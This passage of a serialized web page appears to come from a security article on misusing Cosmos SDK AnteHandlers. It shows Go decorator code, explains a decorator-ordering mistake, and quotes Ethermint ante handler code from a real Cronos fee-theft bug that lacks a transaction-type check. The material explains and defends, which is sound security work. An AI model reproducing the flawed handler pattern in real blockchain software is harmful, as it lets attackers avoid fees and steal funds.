sdkerrors",{"type":27,"tag":207,"props":86091,"children":86092},{"style":238},[86093],{"type":33,"value":1041},{"type":27,"tag":207,"props":86095,"children":86096},{"style":220},[86097],{"type":33,"value":86098},"ErrTxDecode",{"type":27,"tag":207,"props":86100,"children":86101},{"style":238},[86102],{"type":33,"value":1842},{"type":27,"tag":207,"props":86104,"children":86105},{"class":209,"line":4154},[86106,86111],{"type":27,"tag":207,"props":86107,"children":86108},{"style":1325},[86109],{"type":33,"value":86110}," \"invalid tx type\"",{"type":27,"tag":207,"props":86112,"children":86113},{"style":238},[86114],{"type":33,"value":1842},{"type":27,"tag":207,"props":86116,"children":86117},{"class":209,"line":4203},[86118],{"type":27,"tag":207,"props":86119,"children":86120},{"style":238},[86121],{"type":33,"value":75554},{"type":27,"tag":207,"props":86123,"children":86124},{"class":209,"line":4249},[86125],{"type":27,"tag":207,"props":86126,"children":86127},{"style":238},[86128],{"type":33,"value":10645},{"type":27,"tag":207,"props":86130,"children":86131},{"class":209,"line":4290},[86132],{"type":27,"tag":207,"props":86133,"children":86134},{"emptyLinePlaceholder":19},[86135],{"type":33,"value":2062},{"type":27,"tag":207,"props":86137,"children":86138},{"class":209,"line":4304},[86139,86144,86148,86153,86157,86162],{"type":27,"tag":207,"props":86140,"children":86141},{"style":220},[86142],{"type":33,"value":86143}," signers",{"type":27,"tag":207,"props":86145,"children":86146},{"style":226},[86147],{"type":33,"value":83648},{"type":27,"tag":207,"props":86149,"children":86150},{"style":220},[86151],{"type":33,"value":86152}," sigTx",{"type":27,"tag":207,"props":86154,"children":86155},{"style":238},[86156],{"type":33,"value":1041},{"type":27,"tag":207,"props":86158,"children":86159},{"style":1335},[86160],{"type":33,"value":86161},"GetSigners",{"type":27,"tag":207,"props":86163,"children":86164},{"style":238},[86165],{"type":33,"value":15018},{"type":27,"tag":207,"props":86167,"children":86168},{"class":209,"line":5466},[86169,86173,86177,86181,86185,86189,86193,86198],{"type":27,"tag":207,"props":86170,"children":86171},{"style":376},[86172],{"type":33,"value":10321},{"type":27,"tag":207,"props":86174,"children":86175},{"style":220},[86176],{"type":33,"value":4671},{"type":27,"tag":207,"props":86178,"children":86179},{"style":238},[86180],{"type":33,"value":1123},{"type":27,"tag":207,"props":86182,"children":86183},{"style":220},[86184],{"type":33,"value":14428},{"type":27,"tag":207,"props":86186,"children":86187},{"style":226},[86188],{"type":33,"value":83648},{"type":27,"tag":207,"props":86190,"children":86191},{"style":376},[86192],{"type":33,"value":84630},{"type":27,"tag":207,"props":86194,"children":86195},{"style":220},[86196],{"type":33,"value":86197}," signers",{"type":27,"tag":207,"props":86199,"children":86200},{"style":238},[86201],{"type":33,"value":384},{"type":27,"tag":207,"props":86203,"children":86204},{"class":209,"line":5530},[86205,86210,86214,86219,86223,86228,86232,86237,86241,86245,86249,86253,86257,86262],{"type":27,"tag":207,"props":86206,"children":86207},{"style":220},[86208],{"type":33,"value":86209}," balance",{"type":27,"tag":207,"props":86211,"children":86212},{"style":226},[86213],{"type":33,"value":83648},{"type":27,"tag":207,"props":86215,"children":86216},{"style":220},[86217],{"type":33,"value":86218}," abd",{"type":27,"tag":207,"props":86220,"children":86221},{"style":238},[86222],{"type":33,"value":1041},{"type":27,"tag":207,"props":86224,"children":86225},{"style":220},[86226],{"type":33,"value":86227},"bk",{"type":27,"tag":207,"props":86229,"children":86230},{"style":238},[86231],{"type":33,"value":1041},{"type":27,"tag":207,"props":86233,"children":86234},{"style":1335},[86235],{"type":33,"value":86236},"getBalance",{"type":27,"tag":207,"props":86238,"children":86239},{"style":238},[86240],{"type":33,"value":1343},{"type":27,"tag":207,"props":86242,"children":86243},{"style":220},[86244],{"type":33,"value":27552},{"type":27,"tag":207,"props":86246,"children":86247},{"style":238},[86248],{"type":33,"value":1123},{"type":27,"tag":207,"props":86250,"children":86251},{"style":220},[86252],{"type":33,"value":14428},{"type":27,"tag":207,"props":86254,"children":86255},{"style":238},[86256],{"type":33,"value":1123},{"type":27,"tag":207,"props":86258,"children":86259},{"style":220},[86260],{"type":33,"value":86261},"ATOM",{"type":27,"tag":207,"props":86263,"children":86264},{"style":238},[86265],{"type":33,"value":10449},{"type":27,"tag":207,"props":86267,"children":86268},{"class":209,"line":7900},[86269,86273,86278,86282,86287,86291,86296],{"type":27,"tag":207,"props":86270,"children":86271},{"style":376},[86272],{"type":33,"value":10562},{"type":27,"tag":207,"props":86274,"children":86275},{"style":220},[86276],{"type":33,"value":86277}," balance",{"type":27,"tag":207,"props":86279,"children":86280},{"style":238},[86281],{"type":33,"value":1041},{"type":27,"tag":207,"props":86283,"children":86284},{"style":220},[86285],{"type":33,"value":86286},"Amount",{"type":27,"tag":207,"props":86288,"children":86289},{"style":226},[86290],{"type":33,"value":4695},{"type":27,"tag":207,"props":86292,"children":86293},{"style":220},[86294],{"type":33,"value":86295}," MIN_BALANCE",{"type":27,"tag":207,"props":86297,"children":86298},{"style":238},[86299],{"type":33,"value":384},{"type":27,"tag":207,"props":86301,"children":86302},{"class":209,"line":7909},[86303,86308,86312,86316,86320,86324,86328],{"type":27,"tag":207,"props":86304,"children":86305},{"style":376},[86306],{"type":33,"value":86307}," return",{"type":27,"tag":207,"props":86309,"children":86310},{"style":220},[86311],{"type":33,"value":33108},{"type":27,"tag":207,"props":86313,"children":86314},{"style":238},[86315],{"type":33,"value":1123},{"type":27,"tag":207,"props":86317,"children":86318},{"style":220},[86319],{"type":33,"value":86068},{"type":27,"tag":207,"props":86321,"children":86322},{"style":238},[86323],{"type":33,"value":1041},{"type":27,"tag":207,"props":86325,"children":86326},{"style":1335},[86327],{"type":33,"value":86077},{"type":27,"tag":207,"props":86329,"children":86330},{"style":238},[86331],{"type":33,"value":9090},{"type":27,"tag":207,"props":86333,"children":86334},{"class":209,"line":7917},[86335,86340],{"type":27,"tag":207,"props":86336,"children":86337},{"style":220},[86338],{"type":33,"value":86339}," ErrInsufficientBalance",{"type":27,"tag":207,"props":86341,"children":86342},{"style":238},[86343],{"type":33,"value":1842},{"type":27,"tag":207,"props":86345,"children":86346},{"class":209,"line":7926},[86347,86352],{"type":27,"tag":207,"props":86348,"children":86349},{"style":1325},[86350],{"type":33,"value":86351}," \"Insufficient Balance\"",{"type":27,"tag":207,"props":86353,"children":86354},{"style":238},[86355],{"type":33,"value":1842},{"type":27,"tag":207,"props":86357,"children":86358},{"class":209,"line":7934},[86359],{"type":27,"tag":207,"props":86360,"children":86361},{"style":238},[86362],{"type":33,"value":84746},{"type":27,"tag":207,"props":86364,"children":86365},{"class":209,"line":7943},[86366],{"type":27,"tag":207,"props":86367,"children":86368},{"style":238},[86369],{"type":33,"value":10637},{"type":27,"tag":207,"props":86371,"children":86372},{"class":209,"line":7952},[86373],{"type":27,"tag":207,"props":86374,"children":86375},{"style":238},[86376],{"type":33,"value":10645},{"type":27,"tag":207,"props":86378,"children":86379},{"class":209,"line":7961},[86380],{"type":27,"tag":207,"props":86381,"children":86382},{"emptyLinePlaceholder":19},[86383],{"type":33,"value":2062},{"type":27,"tag":207,"props":86385,"children":86386},{"class":209,"line":7969},[86387,86391,86396,86400,86404,86408,86413,86417,86422],{"type":27,"tag":207,"props":86388,"children":86389},{"style":376},[86390],{"type":33,"value":8986},{"type":27,"tag":207,"props":86392,"children":86393},{"style":1335},[86394],{"type":33,"value":86395}," next",{"type":27,"tag":207,"props":86397,"children":86398},{"style":238},[86399],{"type":33,"value":1343},{"type":27,"tag":207,"props":86401,"children":86402},{"style":220},[86403],{"type":33,"value":27552},{"type":27,"tag":207,"props":86405,"children":86406},{"style":238},[86407],{"type":33,"value":1123},{"type":27,"tag":207,"props":86409,"children":86410},{"style":220},[86411],{"type":33,"value":86412},"tx",{"type":27,"tag":207,"props":86414,"children":86415},{"style":238},[86416],{"type":33,"value":1123},{"type":27,"tag":207,"props":86418,"children":86419},{"style":220},[86420],{"type":33,"value":86421},"simulate",{"type":27,"tag":207,"props":86423,"children":86424},{"style":238},[86425],{"type":33,"value":10449},{"type":27,"tag":207,"props":86427,"children":86428},{"class":209,"line":7978},[86429],{"type":27,"tag":207,"props":86430,"children":86431},{"style":238},[86432],{"type":33,"value":451},{"type":27,"tag":36,"props":86434,"children":86435},{},[86436,86438,86443,86445,86451,86453,86459],{"type":33,"value":86437},"Where should this custom ",{"type":27,"tag":84,"props":86439,"children":86441},{"className":86440},[],[86442],{"type":33,"value":85701},{"type":33,"value":86444}," be placed relative to other ",{"type":27,"tag":84,"props":86446,"children":86448},{"className":86447},[],[86449],{"type":33,"value":86450},"AnteHandlers",{"type":33,"value":86452}," provided by cosmos-sdk?\nConsidering that we are only concerned with transactions that satisfy our check, inserting it right after the ",{"type":27,"tag":84,"props":86454,"children":86456},{"className":86455},[],[86457],{"type":33,"value":86458},"SetUpContextDecorator",{"type":33,"value":86460}," should work, right?",{"type":27,"tag":36,"props":86462,"children":86463},{},[86464],{"type":27,"tag":47,"props":86465,"children":86468},{"href":86466,"rel":86467},"https://github.com/cosmos/cosmos-sdk/blob/f0aec3f30dd952e1b4b3a5b25e0412c1af5baaac/x/auth/ante/ante.go#L41",[51],[86469],{"type":33,"value":83970},{"type":27,"tag":101,"props":86471,"children":86473},{"code":86472,"language":83397,"meta":7,"className":83398,"style":7},"anteDecorators := []sdk.AnteDecorator{\n NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n // INSERT HERE\n NewExtensionOptionsDecorator(options.ExtensionOptionChecker),\n NewValidateBasicDecorator(),\n NewTxTimeoutHeightDecorator(),\n NewValidateMemoDecorator(options.AccountKeeper),\n NewConsumeGasForTxSizeDecorator(options.AccountKeeper),\n NewDeductFeeDecorator(options.AccountKeeper, options.BankKeeper, options.FeegrantKeeper, options.TxFeeChecker),\n NewSetPubKeyDecorator(options.AccountKeeper), // SetPubKeyDecorator must be called before all signature verification decorators\n NewValidateSigCountDecorator(options.AccountKeeper),\n NewSigGasConsumeDecorator(options.AccountKeeper, options.SigGasConsumer),\n NewSigVerificationDecorator(options.AccountKeeper, options.SignModeHandler),\n NewIncrementSequenceDecorator(options.AccountKeeper),\n}\n",[86474],{"type":27,"tag":84,"props":86475,"children":86476},{"__ignoreMap":7},[86477,86510,86527,86535,86564,86576,86588,86617,86645,86724,86757,86785,86830,86875,86903],{"type":27,"tag":207,"props":86478,"children":86479},{"class":209,"line":210},[86480,86485,86489,86493,86497,86501,86506],{"type":27,"tag":207,"props":86481,"children":86482},{"style":220},[86483],{"type":33,"value":86484},"anteDecorators",{"type":27,"tag":207,"props":86486,"children":86487},{"style":226},[86488],{"type":33,"value":83648},{"type":27,"tag":207,"props":86490,"children":86491},{"style":238},[86492],{"type":33,"value":83460},{"type":27,"tag":207,"props":86494,"children":86495},{"style":8920},[86496],{"type":33,"value":85961},{"type":27,"tag":207,"props":86498,"children":86499},{"style":238},[86500],{"type":33,"value":1041},{"type":27,"tag":207,"props":86502,"children":86503},{"style":8920},[86504],{"type":33,"value":86505},"AnteDecorator",{"type":27,"tag":207,"props":86507,"children":86508},{"style":238},[86509],{"type":33,"value":18158},{"type":27,"tag":207,"props":86511,"children":86512},{"class":209,"line":244},[86513,86518,86522],{"type":27,"tag":207,"props":86514,"children":86515},{"style":1335},[86516],{"type":33,"value":86517}," NewSetUpContextDecorator",{"type":27,"tag":207,"props":86519,"children":86520},{"style":238},[86521],{"type":33,"value":25646},{"type":27,"tag":207,"props":86523,"children":86524},{"style":4647},[86525],{"type":33,"value":86526},"// outermost AnteDecorator. SetUpContext must be called first\n",{"type":27,"tag":207,"props":86528,"children":86529},{"class":209,"line":270},[86530],{"type":27,"tag":207,"props":86531,"children":86532},{"style":4647},[86533],{"type":33,"value":86534}," // INSERT HERE\n",{"type":27,"tag":207,"props":86536,"children":86537},{"class":209,"line":296},[86538,86543,86547,86551,86555,86560],{"type":27,"tag":207,"props":86539,"children":86540},{"style":1335},[86541],{"type":33,"value":86542}," NewExtensionOptionsDecorator",{"type":27,"tag":207,"props":86544,"children":86545},{"style":238},[86546],{"type":33,"value":1343},{"type":27,"tag":207,"props":86548,"children":86549},{"style":220},[86550],{"type":33,"value":43290},{"type":27,"tag":207,"props":86552,"children":86553},{"style":238},[86554],{"type":33,"value":1041},{"type":27,"tag":207,"props":86556,"children":86557},{"style":220},[86558],{"type":33,"value":86559},"ExtensionOptionChecker",{"type":27,"tag":207,"props":86561,"children":86562},{"style":238},[86563],{"type":33,"value":14018},{"type":27,"tag":207,"props":86565,"children":86566},{"class":209,"line":445},[86567,86572],{"type":27,"tag":207,"props":86568,"children":86569},{"style":1335},[86570],{"type":33,"value":86571}," NewValidateBasicDecorator",{"type":27,"tag":207,"props":86573,"children":86574},{"style":238},[86575],{"type":33,"value":10778},{"type":27,"tag":207,"props":86577,"children":86578},{"class":209,"line":867},[86579,86584],{"type":27,"tag":207,"props":86580,"children":86581},{"style":1335},[86582],{"type":33,"value":86583}," NewTxTimeoutHeightDecorator",{"type":27,"tag":207,"props":86585,"children":86586},{"style":238},[86587],{"type":33,"value":10778},{"type":27,"tag":207,"props":86589,"children":86590},{"class":209,"line":892},[86591,86596,86600,86604,86608,86613],{"type":27,"tag":207,"props":86592,"children":86593},{"style":1335},[86594],{"type":33,"value":86595}," NewValidateMemoDecorator",{"type":27,"tag":207,"props":86597,"children":86598},{"style":238},[86599],{"type":33,"value":1343},{"type":27,"tag":207,"props":86601,"children":86602},{"style":220},[86603],{"type":33,"value":43290},{"type":27,"tag":207,"props":86605,"children":86606},{"style":238},[86607],{"type":33,"value":1041},{"type":27,"tag":207,"props":86609,"children":86610},{"style":220},[86611],{"type":33,"value":86612},"AccountKeeper",{"type":27,"tag":207,"props":86614,"children":86615},{"style":238},[86616],{"type":33,"value":14018},{"type":27,"tag":207,"props":86618,"children":86619},{"class":209,"line":1475},[86620,86625,86629,86633,86637,86641],{"type":27,"tag":207,"props":86621,"children":86622},{"style":1335},[86623],{"type":33,"value":86624}," NewConsumeGasForTxSizeDecorator",{"type":27,"tag":207,"props":86626,"children":86627},{"style":238},[86628],{"type":33,"value":1343},{"type":27,"tag":207,"props":86630,"children":86631},{"style":220},[86632],{"type":33,"value":43290},{"type":27,"tag":207,"props":86634,"children":86635},{"style":238},[86636],{"type":33,"value":1041},{"type":27,"tag":207,"props":86638,"children":86639},{"style":220},[86640],{"type":33,"value":86612},{"type":27,"tag":207,"props":86642,"children":86643},{"style":238},[86644],{"type":33,"value":14018},{"type":27,"tag":207,"props":86646,"children":86647},{"class":209,"line":2065},[86648,86653,86657,86661,86665,86669,86673,86677,86681,86686,86690,86694,86698,86703,86707,86711,86715,86720],{"type":27,"tag":207,"props":86649,"children":86650},{"style":1335},[86651],{"type":33,"value":86652}," NewDeductFeeDecorator",{"type":27,"tag":207,"props":86654,"children":86655},{"style":238},[86656],{"type":33,"value":1343},{"type":27,"tag":207,"props":86658,"children":86659},{"style":220},[86660],{"type":33,"value":43290},{"type":27,"tag":207,"props":86662,"children":86663},{"style":238},[86664],{"type":33,"value":1041},{"type":27,"tag":207,"props":86666,"children":86667},{"style":220},[86668],{"type":33,"value":86612},{"type":27,"tag":207,"props":86670,"children":86671},{"style":238},[86672],{"type":33,"value":1123},{"type":27,"tag":207,"props":86674,"children":86675},{"style":220},[86676],{"type":33,"value":43290},{"type":27,"tag":207,"props":86678,"children":86679},{"style":238},[86680],{"type":33,"value":1041},{"type":27,"tag":207,"props":86682,"children":86683},{"style":220},[86684],{"type":33,"value":86685},"BankKeeper",{"type":27,"tag":207,"props":86687,"children":86688},{"style":238},[86689],{"type":33,"value":1123},{"type":27,"tag":207,"props":86691,"children":86692},{"style":220},[86693],{"type":33,"value":43290},{"type":27,"tag":207,"props":86695,"children":86696},{"style":238},[86697],{"type":33,"value":1041},{"type":27,"tag":207,"props":86699,"children":86700},{"style":220},[86701],{"type":33,"value":86702},"FeegrantKeeper",{"type":27,"tag":207,"props":86704,"children":86705},{"style":238},[86706],{"type":33,"value":1123},{"type":27,"tag":207,"props":86708,"children":86709},{"style":220},[86710],{"type":33,"value":43290},{"type":27,"tag":207,"props":86712,"children":86713},{"style":238},[86714],{"type":33,"value":1041},{"type":27,"tag":207,"props":86716,"children":86717},{"style":220},[86718],{"type":33,"value":86719},"TxFeeChecker",{"type":27,"tag":207,"props":86721,"children":86722},{"style":238},[86723],{"type":33,"value":14018},{"type":27,"tag":207,"props":86725,"children":86726},{"class":209,"line":2092},[86727,86732,86736,86740,86744,86748,86752],{"type":27,"tag":207,"props":86728,"children":86729},{"style":1335},[86730],{"type":33,"value":86731}," NewSetPubKeyDecorator",{"type":27,"tag":207,"props":86733,"children":86734},{"style":238},[86735],{"type":33,"value":1343},{"type":27,"tag":207,"props":86737,"children":86738},{"style":220},[86739],{"type":33,"value":43290},{"type":27,"tag":207,"props":86741,"children":86742},{"style":238},[86743],{"type":33,"value":1041},{"type":27,"tag":207,"props":86745,"children":86746},{"style":220},[86747],{"type":33,"value":86612},{"type":27,"tag":207,"props":86749,"children":86750},{"style":238},[86751],{"type":33,"value":22452},{"type":27,"tag":207,"props":86753,"children":86754},{"style":4647},[86755],{"type":33,"value":86756},"// SetPubKeyDecorator must be called before all signature verification decorators\n",{"type":27,"tag":207,"props":86758,"children":86759},{"class":209,"line":2130},[86760,86765,86769,86773,86777,86781],{"type":27,"tag":207,"props":86761,"children":86762},{"style":1335},[86763],{"type":33,"value":86764}," NewValidateSigCountDecorator",{"type":27,"tag":207,"props":86766,"children":86767},{"style":238},[86768],{"type":33,"value":1343},{"type":27,"tag":207,"props":86770,"children":86771},{"style":220},[86772],{"type":33,"value":43290},{"type":27,"tag":207,"props":86774,"children":86775},{"style":238},[86776],{"type":33,"value":1041},{"type":27,"tag":207,"props":86778,"children":86779},{"style":220},[86780],{"type":33,"value":86612},{"type":27,"tag":207,"props":86782,"children":86783},{"style":238},[86784],{"type":33,"value":14018},{"type":27,"tag":207,"props":86786,"children":86787},{"class":209,"line":2168},[86788,86793,86797,86801,86805,86809,86813,86817,86821,86826],{"type":27,"tag":207,"props":86789,"children":86790},{"style":1335},[86791],{"type":33,"value":86792}," NewSigGasConsumeDecorator",{"type":27,"tag":207,"props":86794,"children":86795},{"style":238},[86796],{"type":33,"value":1343},{"type":27,"tag":207,"props":86798,"children":86799},{"style":220},[86800],{"type":33,"value":43290},{"type":27,"tag":207,"props":86802,"children":86803},{"style":238},[86804],{"type":33,"value":1041},{"type":27,"tag":207,"props":86806,"children":86807},{"style":220},[86808],{"type":33,"value":86612},{"type":27,"tag":207,"props":86810,"children":86811},{"style":238},[86812],{"type":33,"value":1123},{"type":27,"tag":207,"props":86814,"children":86815},{"style":220},[86816],{"type":33,"value":43290},{"type":27,"tag":207,"props":86818,"children":86819},{"style":238},[86820],{"type":33,"value":1041},{"type":27,"tag":207,"props":86822,"children":86823},{"style":220},[86824],{"type":33,"value":86825},"SigGasConsumer",{"type":27,"tag":207,"props":86827,"children":86828},{"style":238},[86829],{"type":33,"value":14018},{"type":27,"tag":207,"props":86831,"children":86832},{"class":209,"line":4095},[86833,86838,86842,86846,86850,86854,86858,86862,86866,86871],{"type":27,"tag":207,"props":86834,"children":86835},{"style":1335},[86836],{"type":33,"value":86837}," NewSigVerificationDecorator",{"type":27,"tag":207,"props":86839,"children":86840},{"style":238},[86841],{"type":33,"value":1343},{"type":27,"tag":207,"props":86843,"children":86844},{"style":220},[86845],{"type":33,"value":43290},{"type":27,"tag":207,"props":86847,"children":86848},{"style":238},[86849],{"type":33,"value":1041},{"type":27,"tag":207,"props":86851,"children":86852},{"style":220},[86853],{"type":33,"value":86612},{"type":27,"tag":207,"props":86855,"children":86856},{"style":238},[86857],{"type":33,"value":1123},{"type":27,"tag":207,"props":86859,"children":86860},{"style":220},[86861],{"type":33,"value":43290},{"type":27,"tag":207,"props":86863,"children":86864},{"style":238},[86865],{"type":33,"value":1041},{"type":27,"tag":207,"props":86867,"children":86868},{"style":220},[86869],{"type":33,"value":86870},"SignModeHandler",{"type":27,"tag":207,"props":86872,"children":86873},{"style":238},[86874],{"type":33,"value":14018},{"type":27,"tag":207,"props":86876,"children":86877},{"class":209,"line":4103},[86878,86883,86887,86891,86895,86899],{"type":27,"tag":207,"props":86879,"children":86880},{"style":1335},[86881],{"type":33,"value":86882}," NewIncrementSequenceDecorator",{"type":27,"tag":207,"props":86884,"children":86885},{"style":238},[86886],{"type":33,"value":1343},{"type":27,"tag":207,"props":86888,"children":86889},{"style":220},[86890],{"type":33,"value":43290},{"type":27,"tag":207,"props":86892,"children":86893},{"style":238},[86894],{"type":33,"value":1041},{"type":27,"tag":207,"props":86896,"children":86897},{"style":220},[86898],{"type":33,"value":86612},{"type":27,"tag":207,"props":86900,"children":86901},{"style":238},[86902],{"type":33,"value":14018},{"type":27,"tag":207,"props":86904,"children":86905},{"class":209,"line":4154},[86906],{"type":27,"tag":207,"props":86907,"children":86908},{"style":238},[86909],{"type":33,"value":451},{"type":27,"tag":36,"props":86911,"children":86912},{},[86913,86915,86920,86922,86928,86929,86935],{"type":33,"value":86914},"Unfortunately, that order wouldn't work. This is because there are other ",{"type":27,"tag":84,"props":86916,"children":86918},{"className":86917},[],[86919],{"type":33,"value":86450},{"type":33,"value":86921},", such as ",{"type":27,"tag":84,"props":86923,"children":86925},{"className":86924},[],[86926],{"type":33,"value":86927},"SigGasConsumeDecorator",{"type":33,"value":1131},{"type":27,"tag":84,"props":86930,"children":86932},{"className":86931},[],[86933],{"type":33,"value":86934},"ConsumeGasForTxSizeDecorator",{"type":33,"value":86936},", that modify account balances. By placing our decorator at the very start of the chain, we might pass the check and later have the signers' balances deducted before reaching the end of the decorator chain and starting transaction execution. Consequently, the invariance we intended to ensure may no longer hold, rendering our check useless.",{"type":27,"tag":36,"props":86938,"children":86939},{},[86940,86942,86948,86950,86955],{"type":33,"value":86941},"The easiest \"mitigation\" is to move our decorator down into the chain list. We say this lightly because it's important to consider various factors such as whether nested ",{"type":27,"tag":84,"props":86943,"children":86945},{"className":86944},[],[86946],{"type":33,"value":86947},"msgs",{"type":33,"value":86949}," are allowed (e.g. the authz module is present), as this precaution alone might not be enough to fully resolve the issue. Without a comprehensive understanding of the entire system, there is a risk that mistakes will still be made in the ",{"type":27,"tag":84,"props":86951,"children":86953},{"className":86952},[],[86954],{"type":33,"value":85776},{"type":33,"value":86956}," chain.",{"type":27,"tag":58,"props":86958,"children":86960},{"id":86959},"real-world-examples-2",[86961],{"type":33,"value":83920},{"type":27,"tag":36,"props":86963,"children":86964},{},[86965,86967,86972,86974,86981],{"type":33,"value":86966},"An instance of ",{"type":27,"tag":84,"props":86968,"children":86970},{"className":86969},[],[86971],{"type":33,"value":85701},{"type":33,"value":86973}," misuse is a ",{"type":27,"tag":47,"props":86975,"children":86978},{"href":86976,"rel":86977},"https://medium.com/immunefi/cronos-theft-of-transactions-fees-bugfix-postmortem-b33f941b9570",[51],[86979],{"type":33,"value":86980},"Theft of Fund bug",{"type":33,"value":86982}," that was exploited in a Cronos contract.",{"type":27,"tag":36,"props":86984,"children":86985},{},[86986,86988,86993,86995,87000,87002,87008,87010,87016,87018,87023,87025,87030],{"type":33,"value":86987},"In this scenario, ",{"type":27,"tag":84,"props":86989,"children":86991},{"className":86990},[],[86992],{"type":33,"value":86947},{"type":33,"value":86994}," are multiplexed to different ",{"type":27,"tag":84,"props":86996,"children":86998},{"className":86997},[],[86999],{"type":33,"value":85701},{"type":33,"value":87001}," sets through the user-controlled ",{"type":27,"tag":84,"props":87003,"children":87005},{"className":87004},[],[87006],{"type":33,"value":87007},"ExtensionOptionsEthereumTx",{"type":33,"value":87009}," option. However, due to a lack of tx validation, if a ",{"type":27,"tag":84,"props":87011,"children":87013},{"className":87012},[],[87014],{"type":33,"value":87015},"MsgEthereumTx",{"type":33,"value":87017}," does not have ",{"type":27,"tag":84,"props":87019,"children":87021},{"className":87020},[],[87022],{"type":33,"value":87007},{"type":33,"value":87024}," specified, it will be routed to non-Ethereum ",{"type":27,"tag":84,"props":87026,"children":87028},{"className":87027},[],[87029],{"type":33,"value":86450},{"type":33,"value":87031},", failing to collect fees from users as intended. Consequently, attackers can exploit the fee refund at the end of transaction processing to steal funds.",{"type":27,"tag":36,"props":87033,"children":87034},{},[87035],{"type":27,"tag":47,"props":87036,"children":87039},{"href":87037,"rel":87038},"https://github.com/crypto-org-chain/ethermint/blob/82805507f7d2e83cad547736883dc22acfb52440/app/ante/ante.go#L33",[51],[87040],{"type":33,"value":83970},{"type":27,"tag":101,"props":87042,"children":87044},{"code":87043,"language":83397,"meta":7,"className":83398,"style":7},"func NewAnteHandler(\n ak evmtypes.AccountKeeper,\n bankKeeper evmtypes.BankKeeper,\n evmKeeper EVMKeeper,\n feeGrantKeeper authante.FeegrantKeeper,\n channelKeeper channelkeeper.Keeper,\n signModeHandler authsigning.SignModeHandler,\n) sdk.AnteHandler {\n return func(\n ctx sdk.Context, tx sdk.Tx, sim bool,\n ) (newCtx sdk.Context, err error) {\n var anteHandler sdk.AnteHandler\n\n defer Recover(ctx.Logger(), &err)\n\n txWithExtensions, ok := tx.(authante.HasExtensionOptionsTx)\n if ok {\n opts := txWithExtensions.GetExtensionOptions()\n if len(opts) > 0 {\n switch typeURL := opts[0].GetTypeUrl(); typeURL {\n case \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\":\n // handle as *evmtypes.MsgEthereumTx\n\n anteHandler = sdk.ChainAnteDecorators(\n NewEthSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n ...\n NewEthIncrementSenderSequenceDecorator(ak), // innermost AnteDecorator.\n )\n\n default:\n return ctx, stacktrace.Propagate(\n sdkerrors.Wrap(sdkerrors.ErrUnknownExtensionOptions, typeURL),\n \"rejecting tx with unsupported extension option\",\n )\n }\n\n return anteHandler(ctx, tx, sim)\n }\n }\n\n // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n\n switch tx.(type) {\n case sdk.Tx:\n anteHandler = sdk.ChainAnteDecorators(\n authante.NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n ...\n authante.NewIncrementSequenceDecorator(ak), // innermost AnteDecorator\n )\n default:\n return ctx, stacktrace.Propagate(\n sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"invalid transaction type: %T\", tx),\n \"transaction is not an SDK tx\",\n )\n }\n\n return anteHandler(ctx, tx, sim)\n }\n}\n",[87045],{"type":27,"tag":84,"props":87046,"children":87047},{"__ignoreMap":7},[87048,87064,87089,87113,87130,87155,87181,87206,87229,87244,87300,87341,87367,87374,87420,87427,87473,87489,87519,87554,87606,87623,87631,87638,87667,87683,87691,87717,87725,87732,87744,87778,87824,87836,87843,87850,87857,87896,87903,87910,87917,87925,87932,87956,87980,88008,88033,88041,88074,88081,88093,88124,88179,88191,88198,88205,88212,88251,88258],{"type":27,"tag":207,"props":87049,"children":87050},{"class":209,"line":210},[87051,87055,87060],{"type":27,"tag":207,"props":87052,"children":87053},{"style":214},[87054],{"type":33,"value":2085},{"type":27,"tag":207,"props":87056,"children":87057},{"style":1335},[87058],{"type":33,"value":87059}," NewAnteHandler",{"type":27,"tag":207,"props":87061,"children":87062},{"style":238},[87063],{"type":33,"value":9090},{"type":27,"tag":207,"props":87065,"children":87066},{"class":209,"line":244},[87067,87072,87077,87081,87085],{"type":27,"tag":207,"props":87068,"children":87069},{"style":220},[87070],{"type":33,"value":87071}," ak",{"type":27,"tag":207,"props":87073,"children":87074},{"style":8920},[87075],{"type":33,"value":87076}," evmtypes",{"type":27,"tag":207,"props":87078,"children":87079},{"style":238},[87080],{"type":33,"value":1041},{"type":27,"tag":207,"props":87082,"children":87083},{"style":8920},[87084],{"type":33,"value":86612},{"type":27,"tag":207,"props":87086,"children":87087},{"style":238},[87088],{"type":33,"value":1842},{"type":27,"tag":207,"props":87090,"children":87091},{"class":209,"line":270},[87092,87097,87101,87105,87109],{"type":27,"tag":207,"props":87093,"children":87094},{"style":220},[87095],{"type":33,"value":87096}," bankKeeper",{"type":27,"tag":207,"props":87098,"children":87099},{"style":8920},[87100],{"type":33,"value":87076},{"type":27,"tag":207,"props":87102,"children":87103},{"style":238},[87104],{"type":33,"value":1041},{"type":27,"tag":207,"props":87106,"children":87107},{"style":8920},[87108],{"type":33,"value":86685},{"type":27,"tag":207,"props":87110,"children":87111},{"style":238},[87112],{"type":33,"value":1842},{"type":27,"tag":207,"props":87114,"children":87115},{"class":209,"line":296},[87116,87121,87126],{"type":27,"tag":207,"props":87117,"children":87118},{"style":220},[87119],{"type":33,"value":87120}," evmKeeper",{"type":27,"tag":207,"props":87122,"children":87123},{"style":8920},[87124],{"type":33,"value":87125}," EVMKeeper",{"type":27,"tag":207,"props":87127,"children":87128},{"style":238},[87129],{"type":33,"value":1842},{"type":27,"tag":207,"props":87131,"children":87132},{"class":209,"line":445},[87133,87138,87143,87147,87151],{"type":27,"tag":207,"props":87134,"children":87135},{"style":220},[87136],{"type":33,"value":87137}," feeGrantKeeper",{"type":27,"tag":207,"props":87139,"children":87140},{"style":8920},[87141],{"type":33,"value":87142}," authante",{"type":27,"tag":207,"props":87144,"children":87145},{"style":238},[87146],{"type":33,"value":1041},{"type":27,"tag":207,"props":87148,"children":87149},{"style":8920},[87150],{"type":33,"value":86702},{"type":27,"tag":207,"props":87152,"children":87153},{"style":238},[87154],{"type":33,"value":1842},{"type":27,"tag":207,"props":87156,"children":87157},{"class":209,"line":867},[87158,87163,87168,87172,87177],{"type":27,"tag":207,"props":87159,"children":87160},{"style":220},[87161],{"type":33,"value":87162}," channelKeeper",{"type":27,"tag":207,"props":87164,"children":87165},{"style":8920},[87166],{"type":33,"value":87167}," 